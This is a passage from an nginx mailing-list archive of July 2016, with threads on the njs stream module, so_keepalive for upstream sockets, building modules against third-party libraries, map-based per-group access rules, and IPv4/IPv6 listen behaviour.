+ } + +The following properties are available in the session object: + + - remoteAddress + - variables{} + - log() + + +Example nginx.conf: + + worker_processes 1; + pid logs/nginx.pid; + + events { + worker_connections 256; + } + + stream { + # include JavaScript file + js_include js-stream.js; + + server { + listen 8000; + + # create $foo and $bar variables and set JavaScript + # functions foo() and bar() from the included JavaScript + # file as their handlers + js_set $foo foo; + js_set $bar bar; + + return $foo-$bar; + } + } + + +js-stream.js: + + function foo(s) { + s.log("hello from foo() handler!"); + return s.remoteAddress; + } + + function bar(s) { + var v = s.variables; + s.log("hello from bar() handler!"); + return "foo-var" + v.remote_port + "; pid=" + v.pid; + } -- _______________________________________________ nginx-devel mailing list nginx-devel at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx-devel -- Maxim Konovalov From nginx-forum at forum.nginx.org Thu Jul 21 14:51:41 2016 From: nginx-forum at forum.nginx.org (linnading) Date: Thu, 21 Jul 2016 10:51:41 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <6618836.ec03c104XX@vbart-laptop> References: <6618836.ec03c104XX@vbart-laptop> Message-ID: <542be2f422bff68aff468e6a9cfa8135.NginxMailingListEnglish@forum.nginx.org> Thanks Francis and Valentin! These options can help a lot to limit requests to upstream server, thought not related to rate limiting. Thanks! 
~L Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268345,268404#msg-268404 From zxcvbn4038 at gmail.com Thu Jul 21 20:07:26 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Thu, 21 Jul 2016 16:07:26 -0400 Subject: how can i get nginx lib In-Reply-To: References: Message-ID: You can get the nginx source code from here: http://nginx.org/ Or here: https://github.com/nginx/nginx On Wed, Jul 20, 2016 at 3:51 PM, Thiago Farina wrote: > > > On Mon, Jun 27, 2016 at 8:37 AM, Pankaj Chaudhary > wrote: > >> >> >> Is there such thing? As far as I know it is distributed only as binary. > > -- > Thiago Farina > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From adityaumrani at gmail.com Fri Jul 22 02:02:48 2016 From: adityaumrani at gmail.com (Aditya Umrani) Date: Thu, 21 Jul 2016 19:02:48 -0700 Subject: so_keepalive option for outbound sockets Message-ID: Hello, I've configured the so_keepalive option for a server (this is also my default server). I do have other server configs listening to the same port. ======== listen 9822 default_server so_keepalive=on; listen 29822 ssl http2 default_server so_keepalive=on; ======== My sysctl settings are set to : ======== net.ipv4.tcp_keepalive_time = 120 net.ipv4.tcp_keepalive_probes = 10 net.ipv4.tcp_keepalive_intvl = 120 ======== However, I see that no tcp keepalive packets are being sent on outbound connections (from nginx to the upstream). I also checked the output of 'netstat -an --timers' I see that no outbound sockets have the 'keepalive' flag. All of them are 'off'. If it matters, the server config which actually servers this request is not the default one, but one of the other configs. I took a quick look at the code and the 'SO_KEEPALIVE' options only shows up on functions which deal with listening sockets. 
Does this mean that nginx does not honor this option for outbound
connections?

Thanks,
Aditya

From pankajitbhu at gmail.com  Fri Jul 22 03:09:52 2016
From: pankajitbhu at gmail.com (Pankaj Chaudhary)
Date: Fri, 22 Jul 2016 08:39:52 +0530
Subject: how i can use third party library while building own nginx module
Message-ID: 

Hi,

How can I use a third-party library while building my own nginx module? I
am using third-party libraries.

Thanks,
Pankaj
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From mostolog at gmail.com  Fri Jul 22 06:22:18 2016
From: mostolog at gmail.com (mostolog at gmail.com)
Date: Fri, 22 Jul 2016 08:22:18 +0200
Subject: Using variables on configuration (map?) for regex
Message-ID: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com>

Hi

I'm trying to /clean/ up a config file and I'm having a headache trying
to do it. Consider the following scenario:

* Users from group gfoo must be allowed to GET URL foo, while adminfoo
must be able to POST
* Users from group gbar must be allowed to GET URL bar, while adminbar
must be able to POST
* ...and so on for ~50 groups.

The configuration at this moment is similar to:

server {
    listen 80;
    server_name foo.domain.com;
    location ~ /content/foo {
        if ($denied_foo) {
            return 403 "Forbidden";
        }
        ...
    }
    location ~ /page/bar/action...and ~10 locations more per server...
}
server {
    listen 80;
    server_name bar.domain.com;
    location ~ /content/bar {
        if ($denied_bar) {
            return 403 "Forbidden";
        }
        ...
    }
    location ~ /page/bar/action...and ~10 locations more per server...
}
...~200 more whatever.domain.com servers

map $request_method:$request_uri:$http_groups $denied_foo {
    default 1;
    ~^GET:/content/foo:gfoo 0;
    ~^POST:/content/foo:adminfoo 0;
}
map $request_method:$request_uri:$http_groups $denied_bar {
    default 1;
    ~^GET:/content/bar:gbar 0;
    ~^POST:/content/bar:adminbar 0;
}
...lots of map directives

I'd like to be able to simplify it by doing something like:

server_name (?<myvar>.*)\.domain\.com;
...
map $request_method:$request_uri:$http_groups $denied {
    default 1;
    ~^GET:/content/$myvar:g$myvar 0;
    ~^POST:/content/$myvar:admin$myvar 0;
}

I have even tried using an auxiliary map this way:

map $servername $myvar {
    ~^(?<v>.*)\.domain\.com $v;
}
map $request_method:$request_uri:$http_groups $denied {
    default 1;
    ~^GET:/content/$myvar:g$myvar 0;
    ~^POST:/content/$myvar:admin$myvar 0;
}

But I haven't succeeded so far. Could you help me?

Having ~200 configuration files doesn't seem like a good option, so omit
"on-build config with script parameters"

Thanks in advance. Regards.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From francis at daoine.org  Fri Jul 22 07:00:24 2016
From: francis at daoine.org (Francis Daly)
Date: Fri, 22 Jul 2016 08:00:24 +0100
Subject: how i can use third party library while building own nginx module
In-Reply-To: 
References: 
Message-ID: <20160722070024.GU12280@daoine.org>

On Fri, Jul 22, 2016 at 08:39:52AM +0530, Pankaj Chaudhary wrote:

Hi there,

> how i can use third party library while building own nginx module as i am
> using third party libraries.

Do you know the compiler command-line that you would need to build your
module with the third party library, if nginx were not involved?

(It probably includes a "-l" argument, and possibly "-L" and "-I"
as well.)

If you look at, for example, auto/lib/geoip/conf or auto/lib/openssl/conf
in the nginx source, does that show you how to set things like
nginx_feature_libs and CORE_LIBS in your module "config" file, in order
that nginx will use a similar compiler command-line?

Good luck with it,

f
-- 
Francis Daly        francis at daoine.org

From mdounin at mdounin.ru  Fri Jul 22 14:32:46 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Fri, 22 Jul 2016 17:32:46 +0300
Subject: so_keepalive option for outbound sockets
In-Reply-To: 
References: 
Message-ID: <20160722143246.GX57459@mdounin.ru>

Hello!
On Thu, Jul 21, 2016 at 07:02:48PM -0700, Aditya Umrani wrote:

> Hello,
>
> I've configured the so_keepalive option for a server (this is also my
> default server). I do have other server configs listening to the same
> port.
> ========
> listen 9822 default_server so_keepalive=on;
> listen 29822 ssl http2 default_server so_keepalive=on;
> ========
>
> My sysctl settings are set to :
> ========
> net.ipv4.tcp_keepalive_time = 120
> net.ipv4.tcp_keepalive_probes = 10
> net.ipv4.tcp_keepalive_intvl = 120
> ========
>
> However, I see that no tcp keepalive packets are being sent on
> outbound connections (from nginx to the upstream). I also checked the
> output of 'netstat -an --timers' I see that no outbound sockets have
> the 'keepalive' flag. All of them are 'off'. If it matters, the server
> config which actually servers this request is not the default one, but
> one of the other configs.
> I took a quick look at the code and the 'SO_KEEPALIVE' options only
> shows up on functions which deal with listening sockets. Does this
> mean that nginx does not honor this option for outbound connections?

Yes. The so_keepalive parameter is configured on listening
sockets and applies to connections accepted through these sockets.

Using SO_KEEPALIVE on sockets to backends is not generally
needed, as these connections are usually local and
well-controlled. (And if that's not the case, many operating
systems have an option to request TCP keepalive for all
connections, like net.inet.tcp.always_keepalive on FreeBSD.
Though it looks like Linux isn't able to do so.)

-- 
Maxim Dounin
http://nginx.org/

From adityaumrani at gmail.com  Fri Jul 22 16:54:59 2016
From: adityaumrani at gmail.com (Aditya Umrani)
Date: Fri, 22 Jul 2016 09:54:59 -0700
Subject: so_keepalive option for outbound sockets
In-Reply-To: <20160722143246.GX57459@mdounin.ru>
References: <20160722143246.GX57459@mdounin.ru>
Message-ID: 

Hi,

Thanks for your prompt reply.

On Fri, Jul 22, 2016 at 7:32 AM, Maxim Dounin  wrote:
> Hello!
> > On Thu, Jul 21, 2016 at 07:02:48PM -0700, Aditya Umrani wrote: > >> Hello, >> >> I've configured the so_keepalive option for a server (this is also my >> default server). I do have other server configs listening to the same >> port. >> ======== >> listen 9822 default_server so_keepalive=on; >> listen 29822 ssl http2 default_server so_keepalive=on; >> ======== >> >> My sysctl settings are set to : >> ======== >> net.ipv4.tcp_keepalive_time = 120 >> net.ipv4.tcp_keepalive_probes = 10 >> net.ipv4.tcp_keepalive_intvl = 120 >> ======== >> >> However, I see that no tcp keepalive packets are being sent on >> outbound connections (from nginx to the upstream). I also checked the >> output of 'netstat -an --timers' I see that no outbound sockets have >> the 'keepalive' flag. All of them are 'off'. If it matters, the server >> config which actually servers this request is not the default one, but >> one of the other configs. >> I took a quick look at the code and the 'SO_KEEPALIVE' options only >> shows up on functions which deal with listening sockets. Does this >> mean that nginx does not honor this option for outbound connections? > > Yes. The so_keepalive parameter is configured on listening > sockets and applies to connections accepted though these sockets. > > Using SO_KEEPALIVE on sockets to backends are not generally > needed, as these connections are usually local and > well-controlled. (And if it's not the case, many operation > systems have an option to request TCP keepalive for all > connection, like net.inet.tcp.always_keepalive on FreeBSD. > Though looks like Linux isn't able to do so.) I will give it a shot through some LD_PRELOAD tricks. Let me know if anyone has other suggestions. 
> > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Aditya From francis at daoine.org Sat Jul 23 08:28:19 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 23 Jul 2016 09:28:19 +0100 Subject: Using variables on configuration (map?) for regex In-Reply-To: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> Message-ID: <20160723082819.GV12280@daoine.org> On Fri, Jul 22, 2016 at 08:22:18AM +0200, mostolog at gmail.com wrote: Hi there, there are a few different questions that you might be asking, and I'm not certain which one you are actually asking. So I'll guess; if I guess wrong, do feel free to reply with other details. > I'm trying to /clean/ up a config file and I'm having a headache > trying to do it. The quick question/answer from the Subject line: if you are asking: how do I use a $variable in the "does this match" part of a "map"; the answer is "you don't". $ is either a literal character (in a string), or the end-of-string metacharacter (in a regex). > Consider the following scenario: > > * Users from group gfoo must be allowed to GET URL foo, while adminfoo > must be able to POST > * Users from group gbar must be allowed to GET URL bar, while adminbar > must be able to POST > * ...and so on for ~50 groups. What is a user and group, in this context? (Your example suggests that your client will send a http header "Groups: gfoo" if this request should be handled as if this user is in the group gfoo. Perhaps you are using a special client configuration where that is true?) Is the "foo" in each of "group gfoo", "group adminfoo", "url foo" always identical? As in: can simple pattern-matching work, or do you need an extra mapping somewhere to tie the names together? 
(This may not matter; but if it is important one way or the other and is *not* included in the problem description, it will probably not be considered for the solution.) > The configuration at this moment is similar to: > > server { > listen 80; > server_name foo.domain.com; > location ~ /content/foo { > if ($denied_foo) { > return 403 "Forbidden"; > } > ... > } > location ~ /page/bar/action...and ~10 locations more per server... > } So that one has foo.domain.com, /content/foo, and /page/bar. > server { > listen 80; > server_name bar.domain.com; > location ~ /content/bar { > if ($denied_bar) { > return 403 "Forbidden"; > } > ... > } > location ~ /page/bar/action...and ~10 locations more per server... > } and that one has bar.domain.com, /content/bar, and /page/bar. Is the /page/bar here the same as the /page/bar in the "foo" section? Or is the "bar" in /page/bar here the same as the "bar" in /content/bar here? Possibly it does not matter; but if it does not matter it should probably not be in the question. > ...~200 whatever.domain.com servers more A bunch of extra servers is not a problem, I think. > map $request_method:$request_uri:$http_groups $denied_foo { > default 1; > ~^GET:/content/foo:gfoo 0; > ~^POST:/content/foo:adminfoo 0; > } > map $request_method:$request_uri:$http_groups $denied_bar { > default 1; > ~^GET:/content/bar:gbat 0; > ~^POST:/content/bar:adminbar 0; > } > ...lots of map directives These map directives look wrong to me. It looks like you should have the $request_uri bit at the end of the "match against this" expansion, since you presumably want /content/bar and /content/bar/something both to match the same way. And it's not clear to me why you have multiple "map" directives. One that sets the single variable "$denied_group" looks like it should be enough. One "default" line; two lines per "foo" or "bar". What am I missing? > I'll like to be able to simplify it doing something like: > > server_name (?.*)\.domain\.com; That can work. > ... 
> map $request_method:$request_uri:$http_groups $denied {
>     default 1;
>     ~^GET:/content/$myvar:g$myvar 0;
>     ~^POST:/content/$myvar:admin$myvar 0;
> }

That can't. You would need two lines per "myvar" value -- but since
you must have the list of myvar values somewhere, you should be able to
auto-generate these lines from that list.

> Having ~200 configuration files doesn't seem a good option, so omit
> "on-build config with script parameters"

I'm not immediately seeing the problem with 200 configuration files.

If the problem is "lots of files", then you could concatenate them all
into one file.

From the question, it is not clear to me whether a user in group gbar
should have any access at all to the server foo.domain.com. And it is
not clear to me whether there is anything else available below /content/
other than /content/foo/, in the server foo.domain.com.

Would a configuration along the lines of

==
server {
    location /content/ {
        if ($denied_group) {
            return 403 "Forbidden";
        }
        ...
    }
    location ~ /page/bar/action...and ~10 locations more per server...
}
==

do what you want?

Cheers,

f
-- 
Francis Daly        francis at daoine.org

From mostolog at gmail.com  Mon Jul 25 08:41:43 2016
From: mostolog at gmail.com (mostolog at gmail.com)
Date: Mon, 25 Jul 2016 10:41:43 +0200
Subject: Using variables on configuration (map?) for regex
In-Reply-To: <20160723082819.GV12280@daoine.org>
References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com>
	<20160723082819.GV12280@daoine.org>
Message-ID: <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com>

Hi

> The quick question/answer from the Subject line:
>
> if you are asking: how do I use a $variable in the "does this match" part
> of a "map"; the answer is "you don't". $ is either a literal character
> (in a string), or the end-of-string metacharacter (in a regex).

Thank you for your clear and concise answer. I couldn't have summarized
it better, either the question or the answer.
> (Your example suggests that your client will send a http header "Groups:
> gfoo" if this request should be handled as if this user is in the group
> gfoo. Perhaps you are using a special client configuration where that
> is true?)

We're using Apereo CAS. The "grouplist" header comes from a trusted
server after the user has successfully authenticated.

> Is the "foo" in each of "group gfoo", "group adminfoo", "url foo" always
> identical? As in: can simple pattern-matching work, or do you need an
> extra mapping somewhere to tie the names together?

Basically, users belong to groups. Some groups have access to certain
operations (GET, PUT, POST, DELETE) on certain URLs.

> Is the /page/bar here the same as the /page/bar in the "foo" section? Or
> is the "bar" in /page/bar here the same as the "bar" in /content/bar here?
>
> Possibly it does not matter; but if it does not matter it should probably
> not be in the question.

These were just examples (which seem to confuse more than help) trying
to detail the scenario: "There are rules to allow some groups to do
specific actions on certain URLs". e.g.:

* groupAll can GET on /asdf
* groupFoo can POST on /foo
* groupBar can POST on /bar (again, names and locations are just examples)
* groupBonus can DELETE on /foo

> These map directives look wrong to me.
>
> It looks like you should have the $request_uri bit at the end of the
> "match against this" expansion, since you presumably want /content/bar
> and /content/bar/something both to match the same way.

I was using .*, but your approach seems better.

> And it's not clear to me why you have multiple "map" directives. One
> that sets the single variable "$denied_group" looks like it should
> be enough. One "default" line; two lines per "foo" or "bar". What am
> I missing?

Again, you're right.

>> map $request_method:$request_uri:$http_groups $denied {
>>     default 1;
>>     ~^GET:/content/$myvar:g$myvar 0;
>>     ~^POST:/content/$myvar:admin$myvar 0;
>> }
> That can't.
You would need two lines per "myvar" value -- but since
> you must have the list of myvar values somewhere, you should be able to
> auto-generate these lines from that list.

I didn't understand that.

> If the problem is "lots of files", then you could concatenate them all
> in to one file.

A kitty just died somewhere.

> From the question, it is not not clear to me whether a user in group gbar
> should have any access at all to the server foo.domain.com. And it is
> not clear to me whether there is anything else available below /content/
> other than /content/foo/, in the server foo.domain.com.

I'm sorry I wasn't able to be clearer.

foo.domain.com:
* GET on certain URLs should be allowed for the gfoo, gfoobar and gAdmin groups
* POST on specific URLs can only be executed by gfoo and gAdmin
* DELETE on some URLs only by gAdmin
* otherwise, the default is denied

bar.domain.com shares the "same" rules, and the same goes for
asdf.domain.com, qwerty.domain.com and iloveyou.domain.com.

And this is where I would like to use a $variable, instead of copying a
bunch of rules for each domain.

> Would a configuration along the lines of
>
> ==
> server {
>     location /content/ {
>         if ($denied_group) {
>             return 403 "Forbidden";
>         }
>         ...
>     }
>     location ~ /page/bar/action...and ~10 locations more per server...
> }
> ==
>
> do what you want?

No, as it doesn't include the method POST/GET part, nor the groups
allowed for each URL.

Thanks a lot
-------------- next part --------------
An HTML attachment was scrubbed...
:( Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267813,268454#msg-268454 From francis at daoine.org Mon Jul 25 18:42:17 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 25 Jul 2016 19:42:17 +0100 Subject: Using variables on configuration (map?) for regex In-Reply-To: <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> <20160723082819.GV12280@daoine.org> <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> Message-ID: <20160725184217.GX12280@daoine.org> On Mon, Jul 25, 2016 at 10:41:43AM +0200, mostolog at gmail.com wrote: Hi there, > >(Your example suggests that your client will send a http header "Groups: > >gfoo" if this request should be handled as if this user is in the group > >gfoo. Perhaps you are using a special client configuration where that > >is true?) > We're using Apereo CAS. The "grouplist" header comes from a trusted > server after user successfully authenticated. Ok; I've read briefly about CAS, and I do not see how exactly the request gets from the client to nginx. But it sounds like the client does not have access to nginx directly; instead it talks "through" the CAS system which adds this http header to all requests. That suggests that (a) nginx can entirely trust the content of the header; and also (b) potentially the access control could be handled by the CAS system instead of the nginx system. (b) is not something to worry about right now, but may be a path towards a solution if you cannot do what you want purely in nginx conf. > "There are rules to allow some groups to do specific actions on > certain URLs". eg: > > * groupAll can GET on /asdf > * groupFoo can POST on /foo > * groupBar can POST on /bar > (again, names and locatiosn are just examples) > * groupBonus can DELETE on /foo They are examples; but you do have (or have access to) the complete list of groups, methods, and locations that are allowed access, somewhere? See below... 
> >> map $request_method:$request_uri:$http_groups $denied {
> >>     default 1;
> >>     ~^GET:/content/$myvar:g$myvar 0;
> >>     ~^POST:/content/$myvar:admin$myvar 0;
> >> }
> >That can't. You would need two lines per "myvar" value -- but since
> >you must have the list of myvar values somewhere, you should be able to
> >auto-generate these lines from that list.
> I didn't understand that.

"That can't" refers to "that map directive will not work as you wish,
because $myvar is not expanded in the first argument of each pair within
the block".

"two lines" was because previously the description was that "foo" meant
that "gfoo" could GET /content/foo and also that "adminfoo" could POST
/content/foo.

The rest of it refers to you knowing which groups are allowed which
access to which locations; and so you can use the example input above
to populate a map directive along the lines of:

map $request_method:$http_groups:$request_uri $denied {
    default 1;
    ~^GET:groupAll:/asdf 0;
    ~^POST:groupFoo:/foo 0;
    ~^POST:groupBar:/bar 0;
    ~^DELETE:groupBonus:/foo 0;
}

Having a few hundred lines like that should not be a problem for "map"
to read, and hopefully should not be a problem for you to write, since
it can be a mechanical export of whatever already has the list of
permissions.

(And if there isn't something that has the list of permissions, that
might be the first thing to resolve.)

After that, in your server{} block, you could just do

if ($denied) {
    return 403 "Forbidden";
}

outside of all location{}s. Or you could limit it to the locations
where you want to control access -- the overall solution depends on the
overall requirements.

> >If the problem is "lots of files", then you could concatenate them all
> >in to one file.
> A kitty just died somewhere.

That suggests that your objection to "lots of files" is not related
to nginx having to open lots of files. (nginx is quite good at opening
lots of files, so long as your system allows it to happen.)
Perhaps your objection is related to you not wanting to write lots of config? (nginx doesn't care - it doesn't write the config.) Or you not wanting to read lots of config? (nginx is quite good at reading lots of config, even if it looks like mostly-duplicate boilerplate.) Or something else? > foo.domain.com GET on certain URLs should be allowed for gfoo, > gfoobar and gAdmin groups > while POST on specific URLs, can be only executed by gfoo and gAdmin > DELETE on some URLs only by gAdmin > otherwise default is denied Ok, so assuming that that set of method:group:url-prefix is complete, I think I'm missing how it is not working with the previous suggestion. Perhaps include $server_name or $host in the "map" definition if you want to be explicit that (e.g) gfoo should not be able to GET /foo on bar.domain.com; only on foo.domain.com. (That was a piece that I had missed in my previous mail, where I suggested turning the many maps into just one.) > bar.domain.com share the "same" rules...the same way like > asdf.domain.com, qwerty.domain.com and iloveyou.docmain.com > > And here is it where I would like to use $variable, instead of > copying a bunch of rules for each domain. In nginx conf, a variable is a per-request expanded thing. A config-time expandable thing should use a macro processor to turn it into as many static things as are needed, and then let nginx read the static things. In some cases, someone has written the code to use a $variable in a directive. In the case of the "location" directive this has not happened, and I suspect will not happen, in stock nginx. What you are describing is, in nginx terms, the job of a macro processor. Use the one you already know to generate the bunch of similar rules. If the rules fragments are *identical*, you could use the nginx "include" directive, which is about the limit of the built-in "macro" processor. (That is to say: not a macro processor at all.) 
> >Would a configuration along the lines of
> >
> >==
> > server {
> >     location /content/ {
> >         if ($denied_group) {
> >             return 403 "Forbidden";
> >         }
> >         ...
> >     }
> >     location ~ /page/bar/action...and ~10 locations more per server...
> > }
> >==
> >
> >do what you want?
> No, as it doesn't include the method POST/GET part, neither the
> groups allowed for each URL.

I thought that it did, assuming that the $denied_group variable is set
in the initial "map" definition.

Ah - I used "$denied" there and "$denied_group" here; sorry, typo/thinko
that was misleading.

From the words I've seen, this looks like it should work. If not, I'm
happy to try guessing again.

Cheers,

f
-- 
Francis Daly        francis at daoine.org

From nginx-forum at forum.nginx.org  Mon Jul 25 23:28:55 2016
From: nginx-forum at forum.nginx.org (nadavkav)
Date: Mon, 25 Jul 2016 19:28:55 -0400
Subject: epoll_wait() reported that client prematurely closed connection,
	so upstream connection is closed too while sending request to upstream
In-Reply-To: 
References: 
Message-ID: <064e3026004dd177f5251e58150442e5.NginxMailingListEnglish@forum.nginx.org>

I have a similar issue

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,258050,268458#msg-268458

From francis at daoine.org  Mon Jul 25 23:35:37 2016
From: francis at daoine.org (Francis Daly)
Date: Tue, 26 Jul 2016 00:35:37 +0100
Subject: Full URL parameter in nginx
In-Reply-To: 
References: <5df555e57f7c3a90870f79fd8dbb54f2.NginxMailingListEnglish@forum.nginx.org>
	<76d78875cb0a9ddd879952d0566bc524.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20160725233537.GY12280@daoine.org>

On Mon, Jul 25, 2016 at 01:15:56PM -0400, iivan wrote:

Hi there,

> No one knows how to fix this? :(

Start at the beginning.

What request do you make of nginx?

What response do you get from nginx?

What response do you want instead?
My guess is that your nginx config could be ok, and you could change your index.cfm to do what you want it to do with the input you have configured nginx to give it. Maybe it will be clear when there are examples of what works and what fails. Cheers, f -- Francis Daly francis at daoine.org From geuis.teses at gmail.com Tue Jul 26 00:24:46 2016 From: geuis.teses at gmail.com (Charles Lawrence) Date: Mon, 25 Jul 2016 17:24:46 -0700 Subject: Nginx not spawning both ipv4 and ipv6 workers Message-ID: I'm in the process of setting up a new server built on ubuntu 16.04 using nginx 1.10.0. The specific issue is that while my new configuration essentially matches my old nginx configuration from an ubuntu 13.10 server using nginx 1.4.4, nginx 1.10.0 is only creating either ipv4 or ipv6 workers, but not both. This behavior is not present on the old server. Not sure what else to try at this point. I've verified that my nginx installation was built with ipv6. > nginx version: nginx/1.10.0 (Ubuntu) > built with OpenSSL 1.0.2g-fips 1 Mar 2016 > TLS SNI support enabled > configure arguments: --with-cc-opt='-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-Bsymbolic-functions -fPIE -pie -Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_addition_module --with-http_dav_module --with-http_geoip_module --with-http_gunzip_module 
--with-http_gzip_static_module --with-http_image_filter_module
--with-http_v2_module --with-http_sub_module --with-http_xslt_module
--with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module
--with-threads

Below are my current configurations for the new server:

> # /etc/nginx/nginx.conf
> user www-data;
> worker_rlimit_nofile 30000;
> worker_processes 8;
> pid /run/nginx.pid;
>
> events {
>     worker_connections 500000;
> }
>
> http {
>     sendfile on;
>     tcp_nopush on;
>     tcp_nodelay on;
>     keepalive_timeout 65;
>     types_hash_max_size 2048;
>
>     include /etc/nginx/mime.types;
>     default_type application/octet-stream;
>
>     ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
>     ssl_prefer_server_ciphers on;
>
>     access_log /var/log/nginx/access.log;
>     error_log /var/log/nginx/error.log;
>
>     gzip on;
>     gzip_disable "msie6";
>     gzip_vary on;
>     gzip_proxied any;
>     gzip_comp_level 6;
>     gzip_buffers 16 8k;
>     gzip_http_version 1.1;
>     gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
>
>     include /etc/nginx/conf.d/*.conf;
>     include /etc/nginx/sites-enabled/*;
> }

Lastly, the weird thing is that whether the workers get bound to ipv4
or ipv6 entirely depends on the order in which the listen directives
are placed. In the following data, I've switched the order and tried
different configurations multiple times. After each change to
/etc/nginx/sites-enabled/blog I did sudo service nginx stop; sudo
service nginx start; sudo lsof -i; to get the data. Also note that I
changed the workers count to 8 after performing these steps. However,
while the number of workers increased, the same behavior was seen where
all workers were either ipv4 or ipv6.
> listen [::]:80; > listen 80; > nginx 27675 root 6u IPv4 204423 0t0 TCP *:http (LISTEN) > nginx 27676 www-data 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80; > nginx 27747 root 6u IPv6 205134 0t0 TCP *:http (LISTEN) > nginx 27748 www-data 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80 default ipv6only=on; > nginx 27819 root 6u IPv6 205849 0t0 TCP *:http (LISTEN) > nginx 27820 www-data 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80 default ipv6only=off; > nginx 27885 root 6u IPv6 206495 0t0 TCP *:http (LISTEN) > nginx 27886 www-data 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80 default; > nginx 27953 root 6u IPv6 207184 0t0 TCP *:http (LISTEN) > nginx 27954 www-data 6u IPv6 207184 0t0 TCP *:http (LISTEN) From mostolog at gmail.com Tue Jul 26 06:23:01 2016 From: mostolog at gmail.com (mostolog at gmail.com) Date: Tue, 26 Jul 2016 08:23:01 +0200 Subject: Using variables on configuration (map?) for regex In-Reply-To: <20160725184217.GX12280@daoine.org> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> <20160723082819.GV12280@daoine.org> <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> <20160725184217.GX12280@daoine.org> Message-ID: <3ebc4808-8417-38fe-65fe-10b8fb472af2@gmail.com> Hi > Ok; I've read briefly about CAS, and I do not see how exactly the request > gets from the client to nginx. > > But it sounds like the client does not have access to nginx directly; > instead it talks "through" the CAS system which adds this http header > to all requests. You got the idea. > That suggests that (a) nginx can entirely trust the content of the header; > and also (b) potentially the access control could be handled by the CAS > system instead of the nginx system. > > (b) is not something to worry about right now, but may be a path towards > a solution if you cannot do what you want purely in nginx conf. 
Our current implementation doesn't handle authorization but
authentication. That's on the TODO list.

> They are examples; but you do have (or have access to) the complete list
> of groups, methods, and locations that are allowed access, somewhere?
>
> See below...

Unfortunately not...at least not in an easy way. I could query LDAP for
groups, but that is - IMHO - going too far. Methods: HTTP; locations:
yes, I have them on paper :P

> "That can't" refers to "that map directive will not work as you wish,
> because $myvar is not expanded in the first argument of each pair within
> the block".

That's a pity.

> map $request_method:$http_groups:$request_uri $denied {
>     default 1;
>     ~^GET:groupAll:/asdf 0;
>     ~^POST:groupFoo:/foo 0;
>     ~^POST:groupBar:/bar 0;
>     ~^DELETE:groupBonus:/foo 0;
> }

That's similar to what I'm doing now...

map $request_method:$http_groups:$request_uri $denied {
    default 1;
    ~^GET:gfoo:/foo 0;
    ~^GET:gbar:/bar 0;
    ... 200 lines ...
    ~^POST:gfoo:/foo/create 0;
    ~^POST:gbar:/bar/create 0;
    ... 200 lines ...
}

...and that's why I was trying to reduce it to:

map $request_method:$http_groups:$request_uri $denied {
    default 1;
    ~^GET:group$group:/$group 0;
    ~^POST:group$group:/$group/create 0;
    ... (a few more lines) ...
}

> Perhaps your objection is related to you not wanting to write lots of
> config? (nginx doesn't care - it doesn't write the config.) Or you not
> wanting to read lots of config? (nginx is quite good at reading lots
> of config, even if it looks like mostly-duplicate boilerplate.) Or
> something else?

The number of human errors is directly proportional to the number of
files you have to handle :P

> Ok, so assuming that that set of method:group:url-prefix is complete,
> I think I'm missing how it is not working with the previous suggestion.
It works...in the long/ugly form

> Perhaps include $server_name or $host in the "map" definition if you
> want to be explicit that (e.g) gfoo should not be able to GET /foo on
> bar.domain.com; only on foo.domain.com.

Already doing that, which makes rules appear like:

map $request_method:$http_groups:$host:$request_uri $denied {
    default 1;
    ~^GET:gfoo:foo.domain.com:/foo 0;
    ~^GET:gbar:bar.domain.com:/bar 0;
    ... 200 lines ...
    ~^POST:gfoo:foo.domain.com:/foo/create 0;
    ~^POST:gbar:bar.domain.com:/bar/create 0;
    ... 200 lines ...
}

> In nginx conf, a variable is a per-request expanded thing. A config-time
